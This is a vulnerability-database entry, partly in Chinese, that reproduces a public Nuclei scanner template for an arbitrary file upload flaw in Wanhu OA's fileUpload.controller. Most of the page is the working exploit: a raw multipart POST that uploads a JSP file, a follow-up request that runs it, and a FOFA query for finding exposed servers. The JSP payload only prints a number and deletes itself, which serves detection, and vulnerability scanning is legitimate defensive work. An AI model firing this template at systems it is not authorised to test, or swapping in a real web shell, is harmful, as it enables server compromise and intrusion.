wanhu-oa-fileupload-controller: Wanhu OA Fileupload Controller - Arbitrary File Upload

日期: 2025-08-01 | 影响软件: Wanhu OA File Upload Controller | POC: 已公开

漏洞描述

There is an arbitrary file upload vulnerability in Wanhu OA fileUpload.controller. An attacker can upload any file through the vulnerability.

PoC代码[已公开]

id: wanhu-oa-fileupload-controller

info:
  name: Wanhu OA Fileupload Controller - Arbitrary File Upload
  author: SleepingBag945
  severity: critical
  description: |
    There is an arbitrary file upload vulnerability in Wanhu OA fileUpload.controller. An attacker can upload any file through the vulnerability.
  reference:
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/oa/%E4%B8%87%E6%88%B7OA/%E4%B8%87%E6%88%B7OA%20fileUpload.controller%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md?plain=1#L24
    - https://github.com/tr0uble-mAker/POC-bomber/blob/d2433ac41eaa58eb4fb0876ec05e3b645e10ecd7/pocs/redteam/wanhu_oa_fileupload-controller_fileupload_2022.py#L20
  metadata:
    verified: true
    max-request: 2
    fofa-query: app="万户网络-ezOFFICE"
  tags: wanhu,oa,fileupload,controller,intrusive,vuln
variables:
  num1: "{{rand_int(1000, 9999)}}"
  num2: "{{rand_int(1000, 9999)}}"
  result: "{{to_number(num1)*to_number(num2)}}"

http:
  - raw:
      - |
        POST /defaultroot/upload/fileUpload.controller HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=b0d829daa06c13d6b3e16b0ad21d1eed
        Cookie: OASESSIONID=416B4CE965CD27DEED8197A8528A33E6

        --b0d829daa06c13d6b3e16b0ad21d1eed
        Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp"
        Content-Type: application/octet-stream

        <%out.print({{num1}}*{{num2}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
        --b0d829daa06c13d6b3e16b0ad21d1eed--
      - |
        GET /defaultroot/upload/html/{{filename}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200 && contains(body_1, "\"result\":\"success\"") && contains(body_1,"fileSize")'
          - 'status_code_2 == 200 && contains(body_2,"{{result}}")'
        condition: and

    extractors:
      - type: regex
        name: filename
        group: 1
        regex:
          - '"data":"(.*?)"'
        internal: true
# digest: 490a0046304402204af24cc33ac32e63fbd2c02fe04663a1576d1d3390b564b677823af36d7c2272022014f01b49a7df1129169c2aa66c40ad97d0086fcdee1446152d376698438fec51:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/wanhu/wanhu-oa-fileupload-controller-arbitrary-file-upload.yaml

相关漏洞推荐